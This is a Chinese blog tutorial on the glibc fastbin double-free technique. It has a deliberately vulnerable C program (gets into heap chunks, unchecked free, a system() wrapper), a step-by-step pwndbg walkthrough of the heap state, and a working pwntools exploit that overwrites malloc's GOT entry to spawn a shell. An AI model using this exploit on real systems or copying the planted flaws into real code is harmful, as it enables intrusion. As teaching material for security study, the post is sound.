Fastbin Double Free

最新推荐文章于 2024-06-26 19:44:48 发布
最新推荐文章于 2024-06-26 19:44:48 发布
阅读量5k 收藏 5
点赞数 3
分类专栏: Pwn
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/86555028
版权
Pwn 同时被 2 个专栏收录
28 篇文章 8 订阅
订阅专栏
6 篇文章 1 订阅
订阅专栏

似水流年月下花前 一舞倾城醉红颜
岁暮天寒月缺花残 独留孤影忆从前

简介

fastbin attack 是一类漏洞的利用方法,是指所有基于 fastbin 机制的漏洞利用方法,而fastbin_double_free就是其中的一种,这类漏洞利用的前提是:
存在堆溢出、use-after-free等能控制chunk内容的漏洞
漏洞发生于fastbin类型的chunk中
Fastbin Double Free就是其字面所表达的意思,当一个内存被释放之后再次被释放,就是Free()了同一块内存多次,其精髓在于多次分配可以从 fastbin 链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆 (type confused) 的效果

原理

Fastbin Double Free 能够成功利用主要有两部分的原因:
fastbin 的堆块被释放后 next_chunk 的 pre_inuse 位不会被清空
fastbin 在执行 free 的时候仅验证了 main_arena 直接指向的块,即链表指针头部的块。对于链表后面的块,并没有进行验证
通俗的讲就是当我们申请的一块chunk被释放后,它将以单链的形式被串在fastbin中,然后会有一个fast指针指向最后一个链上来了的chunk,当下一个chunk被释放后,将被链在上一个chunk的前面,fast指针向前移动

实例

heap.c

#include<stdio.h>
#include<stdlib.h>
#include<string.h>

void sh(char *id)
{
	system(id);	
}

int main()
{
	setvbuf(stdout,0,_IONBF,0);
	int cmd,idx,sz;
	char *ptr[10];
	memset(ptr,0,sizeof(ptr));
	puts("1.malloc+gets\n2.free\n3.puts\n");
	while(1)
	{
		printf("> ");
		scanf("%d %d",&cmd,&idx); //这里cmd是选择功能,idx是为了区分申请的第几个chunk
		idx %= 10;
		if(cmd==1)
		{
			scanf("%d%*c",&sz);
			ptr[idx] = malloc(sz);
			gets(ptr[idx]);
		}
		else if(cmd==2)
		{
			free(ptr[idx]);
		}
		else if(cmd==3)
		{
			puts(ptr[idx]);
		}
		else
		{
			exit(0);
		}
	}
 	return 0;
}

编译:

gcc -no-pie heap.c -o heap -g -w

分析:
这个程序主要有3个功能,malloc+gets申请一块chunk并且向chunk中写入一段内容,free释放一块chunk,puts打印出一个chunk,很明显这个程序中有double_free漏洞
先运行程序看看:

root@sir-PC:/home/sir/desktop# ./heap
1.malloc+gets
2.free
3.puts

> 1 0
25 aaaabbbb
> 3 0
aaaabbbb
> 2 0
>

double_free的基本思路:
为了使操作更简单每次我们的操作的chunk的大小都应该相同
首先先申请两块chunk:ptr[0]和ptr[1],随便写入8字节的内容,然后分别free(ptr[0]),free(ptr[1]),free(ptr[0]),此时在ptr[0]和ptr[1]之间形成了一个双向链表,然后我们再申请一个chunk:ptr[2],写入我们需要修改的地址,然后在申请两个chunk:ptr[3]和ptr[4],随便写入8字节的内容,最后再次申请一个chunk:ptr[5],此时写入我们需要修改成的内容,就可以实现任意地址内容修改了

演示

现在我们来演示一下:

root@sir-PC:/home/sir/desktop# gdb heap
GNU gdb (Debian 7.12-6+b2) 7.12.0.20161007-git
pwndbg: loaded 174 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from heap...done.
pwndbg> b 20
Breakpoint 1 at 0x40083b: file heap.c, line 20.
pwndbg> r
Starting program: /home/sir/desktop/heap 
1.malloc+gets
2.free
3.puts


Breakpoint 1, main () at heap.c:20
20			printf("> ");
pwndbg> n
1 0
pwndbg> c
Continuing.
25 aaaabbbb   #申请第一次ptr[0]
pwndbg> p ptr[0]
$1 = 0x602670 "aaaabbbb"
pwndbg> x/20gx 0x602670-16
0x602660:	0x0000000000000000	0x0000000000000031
0x602670:	0x6262626261616161	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000000
0x602690:	0x0000000000000000	0x0000000000020971
0x6026a0:	0x0000000000000000	0x0000000000000000
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000000000
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
> 1 1
25 qqqqssss   #申请第二次ptr[1]
pwndbg> x/20gx 0x602670-16
0x602660:	0x0000000000000000	0x0000000000000031
0x602670:	0x6262626261616161	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000000
0x602690:	0x0000000000000000	0x0000000000000031
0x6026a0:	0x7373737371717171	0x0000000000000000
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000020941
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
> 2 0  #释放ptr[0]
pwndbg> x/20gx 0x602670-16
0x602660:	0x0000000000000000	0x0000000000000031
0x602670:	0x0000000000000000	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000000
0x602690:	0x0000000000000000	0x0000000000000031
0x6026a0:	0x7373737371717171	0x0000000000000000
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000020941
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
> 2 1  #释放ptr[1]
pwndbg> x/20gx 0x602670-16
0x602660:	0x0000000000000000	0x0000000000000031
0x602670:	0x0000000000000000	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000000
0x602690:	0x0000000000000000	0x0000000000000031
0x6026a0:	0x0000000000602670	0x0000000000000000 //bp指向0x602670 ptr[0]
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000020941
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
> 2 0	#再次释放ptr[0]
pwndbg> x/20gx 0x602670-16
0x602660:	0x0000000000000000	0x0000000000000031
0x602670:	0x00000000006026a0	0x0000000000000000 //bp指向0x6026a0 ptr[1]
0x602680:	0x0000000000000000	0x0000000000000000
0x602690:	0x0000000000000000	0x0000000000000031
0x6026a0:	0x0000000000602670	0x0000000000000000
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000020941
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000

此时我们double_free的工作就做完了,现在我们来修改一个任意地址的内容,为了方便输入我们就修改0x602660这个地址的内容,我们看到了0x602660原来的值为0,我们将其修改为AAAAAAAA,即0x4141414141414141

pwndbg> c
Continuing.
> 1 2
25 `&`		#申请第三次ptr[2],写入0x602660
pwndbg> x/20gx 0x602670-16
0x602660:	0x0000000000000000	0x0000000000000031
0x602670:	0x0000000000602660	0x0000000000000000	//ptr[2],即原来的ptr[0]
0x602680:	0x0000000000000000	0x0000000000000000
0x602690:	0x0000000000000000	0x0000000000000031
0x6026a0:	0x0000000000602670	0x0000000000000000
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000020941
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
> 1 3
25 aaaabbbb	#申请第四次ptr[3]
pwndbg> x/20gx 0x602670-16
0x602660:	0x0000000000000000	0x0000000000000031
0x602670:	0x0000000000602660	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000000
0x602690:	0x0000000000000000	0x0000000000000031
0x6026a0:	0x6262626261616161	0x0000000000000000	//ptr[3],即原来的ptr[1]
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000020941
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000
pwndbg> c
Continuing.
> 1 4
25 qqqqssss	#申请第五次ptr[4]
pwndbg> x/20gx 0x602670-16
0x602660:	0x0000000000000000	0x0000000000000031
0x602670:	0x7373737371717171	0x0000000000000000 //ptr[4],将ptr[2]覆盖了
0x602680:	0x0000000000000000	0x0000000000000000
0x602690:	0x0000000000000000	0x0000000000000031
0x6026a0:	0x6262626261616161	0x0000000000000000
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000020941
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000

如果我们再次申请一块chunk,我们就在0x602660的位置写入我们想要的东西了,因为此时fast指针已经指向了0x602660的位置了

pwndbg> c
Continuing.
> 1 5
25 AAAAAAAA	第六次申请ptr[5]
pwndbg> x/20gx 0x602670-16
0x602660:	0x4141414141414141	0x0000000000000000 //已经被修改了
0x602670:	0x7373737371717171	0x0000000000000000
0x602680:	0x0000000000000000	0x0000000000000000
0x602690:	0x0000000000000000	0x0000000000000031
0x6026a0:	0x6262626261616161	0x0000000000000000
0x6026b0:	0x0000000000000000	0x0000000000000000
0x6026c0:	0x0000000000000000	0x0000000000020941
0x6026d0:	0x0000000000000000	0x0000000000000000
0x6026e0:	0x0000000000000000	0x0000000000000000
0x6026f0:	0x0000000000000000	0x0000000000000000

很明显0x602660位置的内容已经被我们修改了,如果我们把0x602660换成一个特殊的地址,比如malloc函数got表的地址,然后将其换成sh()函数的地址,那么当我们再次调用malloc函数的时候就会去调用sh()函数了

EXP

sir@sir-PC:~/desktop$ objdump -R heap

heap:     文件格式 elf64-x86-64

DYNAMIC RELOCATION RECORDS
OFFSET           TYPE              VALUE 
0000000000600ff0 R_X86_64_GLOB_DAT  __libc_start_main@GLIBC_2.2.5
0000000000600ff8 R_X86_64_GLOB_DAT  __gmon_start__
0000000000601078 R_X86_64_COPY     stdout@@GLIBC_2.2.5
0000000000601018 R_X86_64_JUMP_SLOT  free@GLIBC_2.2.5
0000000000601020 R_X86_64_JUMP_SLOT  puts@GLIBC_2.2.5
0000000000601028 R_X86_64_JUMP_SLOT  system@GLIBC_2.2.5
0000000000601030 R_X86_64_JUMP_SLOT  printf@GLIBC_2.2.5
0000000000601038 R_X86_64_JUMP_SLOT  memset@GLIBC_2.2.5
0000000000601040 R_X86_64_JUMP_SLOT  gets@GLIBC_2.2.5
0000000000601048 R_X86_64_JUMP_SLOT  malloc@GLIBC_2.2.5
0000000000601050 R_X86_64_JUMP_SLOT  setvbuf@GLIBC_2.2.5
0000000000601058 R_X86_64_JUMP_SLOT  __isoc99_scanf@GLIBC_2.7
0000000000601060 R_X86_64_JUMP_SLOT  exit@GLIBC_2.2.5

pwndbg> p sh
$2 = {void (char *)} 0x4007d7 <sh>

所以我们只需要将0x601048的内容修改为0x4007d7就可以了,但是因为system()函数需要一个参数’sh’,所以我们从0x601040位置开始写入,将0x601040写入’sh‘,然后在最后再次调用malloc函数时,将sz参数换为’sh‘的地址就可以了,但是要注意的是输入的sz形式为%d,所以需要将0x601040换为十进制,即6295616

from pwn import *
context.log_level = 'debug'
p = process('./heap')
elf =ELF('./heap')
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
    gdb.attach(p)
def cmd(x):
    p.recvuntil('> ')
    p.send(x+'\n')

def molloc(i,s):
    cmd('1 %d\n25 %s'%(i,s))

def free(i):
    cmd('2 %d'%i)
    
def put(i):
    cmd('3 %d'%i)

molloc(0,'a'*8)
molloc(1,'b'*8)
free(0)
free(1)
free(0)

molloc(2,p64(0x0601040))
molloc(3,'/bin/sh')
molloc(4,'/bin/sh')
x = p64(0x6873) + p64(0x4007d7) #0x6873 = 'sh'
molloc(5,x)

p.recvuntil('> ')
p.sendline('1 6')
p.sendline('6295616 aaaaaaaa')  # 0x601040 = 6295616
p.interactive()
钞sir
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
fastbin attack + unsorted bin attack+ heap overflow+ double free fastbin + double free unlink
qq_39869547的博客
10-27 373
0x1 fastbin依靠单链表来组织的,堆管理结构始终维护一个指向最后一个chunk的指针(倒数第二个chunk的fd,通常情况这个fd指向的是下一个chunk起始地址)。这个指针决定了下一次要分配的chunk地址。 也就是说默认分配最好一个chunk给用户使用,同时最后一个chunk也是我们一开始第一个free掉的 0x2 我们的目的修改某一个chunk的fd ,这样我们就可以任意地址分配我们...
一道堆方向的pwn(double free & unsorted bins)
F_Day_的博客
10-17 824
一道堆方向的pwn(double free & unsorted bins)做题环境什么是double free 在某博客上看到了一道堆的题,博主说是入门的,嗯,那正好适合我,于是我花了一周终于出结果了。。。。。。 来看看我都遇到了什么问题 做题环境 Ubuntu 20.04.3 LTS,这是我在微软商店下载的子系统,也是一切万恶之源的开始 题目:Roc826 什么是double free 希望再次之前,你已经知道什么是堆了。 double free就是对一个堆free两次 在堆中,free后堆
好好说话之Fastbin Attack(1):Fastbin Double Free
hollk’s blog
10-23 2936
好像拖更了好久。。。实在是抱歉。。。。主要是fastbin attack包含了四个部分,后面的例题不知道都对应着哪个方法,所以做完了例题才回来写博客。fastbin attack应该也会分四篇文章分开写。学了这么长时间pwn给我最大的感受就是量变确实可以引起质变,现在做题或者学习新的技术的时候可以隐约的进行以点看面的思考,通过某一处问题会在心里想象可能会引发什么什么样的后果。总的来说不后悔入坑pwn,字节之间的环环相扣让我深深的着迷!
【C语言】解决C语言报错:Double Free
最新发布
Easonmax的博客
06-26 1217
Double Free(双重释放)是C语言中一种常见且危险的内存管理错误。它通常在程序尝试释放已经释放的内存时发生,可能导致程序崩溃、数据损坏,甚至被恶意利用。本文将详细介绍Double Free的产生原因,提供多种解决方案,并通过实例代码演示如何有效避免和解决此类错误。Double Free,即双重释放,是指程序在释放某块内存后,又尝试再次释放该内存。这种错误会破坏内存管理机制,导致程序行为不可预测,通常会触发运行时错误(如段错误)或内存破坏。
【Linux堆利用】Fastbin Double Free
、moddemod
06-16 446
Double Free是针对fastbin的攻击,字面意思就是重复释放内存,也就是两次free()同一块内存导致的漏洞。 由于fastbin的机制,在满足fastbin的chunk在被释放后它下一个chunk的P位不会被置为0,也就是说即使当前chunk被释放掉了,但是他的next_chunk的P为还依然为1(1表示前一个chunk正在使用中),但他却是已经被free()掉了,这样做的目的是为了防止chunk被合并(因为现实证明,就是程序通常会申请小内存块比较频繁,如果每次申请释放都重复分割合并,会导致性能
printf打印二进制_二进制安全之堆溢出(系列)—— fastbin double free
weixin_39996134的博客
12-06 140
本文是二进制安全之堆溢出系列的第九章节,主要介绍 fastbin double free。原理介绍Fastbin Double Free 是指 fastbin 的 chunk 可以被多次释放,因此可以在 fastbin 链表中存在多次。 这样导致的后果是多次分配可以从 fastbin 链表中取出同一个堆块,相当于多个指针指向同一个堆块。原因fastbin 的堆块被释放后 next_chunk 的...
综合交易平台CTP Linux Double Free解决方案
03-16
CTP开发中,如果把Trade,Market的so放在一起开发,如果不做处理,会遇到double free or corruption(!prev)的错误,基本如下: *** glibc detected *** ./bin/quant_ctp_XTrader_no_debug_2017-03-16_15-36-20: ...
memory leak & double free如何排查?
02-26
本文从自己动手构造一个内存泄露分析工具的方面入手,而不对具体内存排查工具的使用进行说明,以展示内存泄露排查的本质,提供一些思路,当在手头没有现成工具可以使用的情况下让自己不至于那么的无助,至少我们还...
Double Sided Shaders
12-04
This pack contains four double sided shaders. You can easily create two sided materials using Diffuse map(transparency in the alpha channel), normal map and specular map.
jisuanqi.rar_double精度
09-23
在这个"jisuanqi.rar_double精度"的压缩包中,我们关注的是在VC++环境下,使用double类型进行四则运算时可能出现的精度丢失问题。double类型是C++中用于表示浮点数的一种数据类型,具有较高的精度,但并非无限精确。...
c++中double与string相互转换算法
04-16
本文将详细讨论如何在C++中将`double`类型的数值转换为`std::string`字符串,以及如何将`std::string`转换回`double`。我们将基于提供的`stringtodouble`工程文件进行讨论。 首先,让我们探讨`double`转`string`的...
Fastbin attack
aoque9909的博客
06-25 408
Fastbin Attack 暂时接触到了两种针对堆分配机制中fastbin的攻击方式,double free和house of spirit Double free 基本原理 与uaf是对free之后的指针直接进行操作不同,double free通过利用fastbin对堆的分配机制,改写在fastbin中的chunk,实现对指定内存的堆块分配。 先正常释放chunk1和c...
fastbin attack
m0_64195960的博客
07-19 1410
FastbinDoubleFree是指fastbin的chunk可以被多次释放,因此可以在fastbin链表中存在多次。这样导致的后果是多次分配可以从fastbin链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆(typeconfused)的效果。FastbinDoubleFree能够成功利用主要有两部分的原因fastbin的堆块被释放后next_chunk的pre_inuse位不会被清空1.1.1该技术的核心。......
【堆漏洞 - Fastbin attack】
m0_52343643的博客
04-06 284
漏洞发生于fastbin的chunk,且存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞。
fastbin attack快速入门
abelxu
11-13 1138
0x01 fastbin简介 Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小堆块。fastbin按照单链表结构进行组织,相同大小的bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,堆块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小堆块的分配。 正常fastbin的使用 通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。 #include<stdio
Fastbin attack总结
WateranFire的博客
10-12 262
double free 思路: 构造fake chunk,将free chunk的fd指向fake chunk,使得下次malloc时返回fake chunk 检测: (1)fastbin 在执行 free 的时候仅验证了 main_arena 直接指向的块,即链表指针头部的块。对于链表后面的块,并没有进行验证。 (2)malloc申请伪造的fastbin时会检测fastbin的SIZE 流程: a1=malloc(); a2=malloc(); free(a1); free(a2); //
好好说话之Fastbin Attack(2):House Of Spirit
hollk’s blog
10-30 3118
Fastbin Attack的第二种攻击方式House Of Spirit,相对来说是double free的升华。在检查绕过的时候会相对麻烦一点,其他的地方还是挺简单的,如果上一篇文上你领悟的很好的话,这篇文章也不会很难理解。 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
[pwn]堆:fastbin attack详解
热门推荐
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要求是我们能够修改“已释放”堆块。通常情况下与double fr...
堆漏洞挖掘——fastbin attack漏洞
董哥的黑板报
08-12 3168
一、核心思想 通过fastbins链的管理,达到目标地址(target)读写 二、原理图解 fastbin存储freechunk的单链表结构: fastbins是如何存取fastchunk的,见文章:https://blog.csdn.net/qq_41453285/article/details/97613588 第一步:我们知道被free的chunk会被放入到arena所管理的f...
double free
10-27
Double Free是指同一个指针被释放两次,这种情况可能会导致程序崩溃或者被攻击者利用来执行恶意代码。实际上,只要是释放指向堆内存的指针都有可能产生Double Free漏洞。Double Free的原理和堆溢出类似,都是通过...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值